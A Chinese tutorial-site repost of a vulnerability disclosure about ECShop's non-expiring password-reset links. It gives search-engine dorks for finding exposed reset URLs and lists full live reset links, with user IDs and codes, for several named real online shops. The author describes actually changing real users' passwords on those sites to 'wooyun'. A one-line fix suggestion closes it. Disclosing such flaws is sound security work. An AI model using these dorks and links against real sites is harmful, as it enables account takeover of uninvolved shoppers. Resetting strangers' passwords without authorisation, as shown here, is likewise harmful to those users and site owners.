网站地图    收藏   

主页 > 后端 > 网站安全 >

ECShop任意用户密码盲改漏洞 - 网站安全 - 自学p

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] ECShop找回密码功能设计缺陷,修改密码链接没有时效性可通过搜索引擎搜索关键词 来重置ecshop网站上的部分用户的密码只是不知道用户名无法登陆,只能盲改密码谷歌inurl:user php?act=ge...

ECShop找回密码功能设计缺陷,修改密码链接没有时效性




可通过搜索引擎搜索关键词 来重置ecshop网站上的部分用户的密码



只是不知道用户名无法登陆,只能盲改密码



谷歌

inurl:user.php?act=get_password&uid=




 

1.jpg





打开一个链接:
 

http://class.enfamily.cn/user.php?act=get_password&uid=277576&code=09d77a40ca80fdfbd33315131e554bb0




 

2.jpg





随便输入密码 例如:wooyun


 

3.jpg





已经修改成功,只是不知道用户名无法登陆。



其他搜索引擎



通过bing.com搜索关键词:user.php?act=get_password&uid=


 

4.jpg





找几个例子


 

http://www.yofus.com/user.php?act=get_password&uid=666167&code=e32d1180abe40484c2c3743e2393e5b0





密码同样改为wooyun
 

5.jpg




 

6.jpg








 

http://www.ziai168.com/user.php?act=get_password&uid=9086&code=f19cea38ba7af425a8d3eea5a0c4beb4




 

7.jpg




 

8.jpg








 

http://shop.careland.com.cn/user.php?act=get_password&uid=9163183&code=cad8dd2c08a321666e0da6a5bcc56e85




 

9.jpg




 

10.jpg

 

 

修复方案:

对修改密码的code设置一个时效性。

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论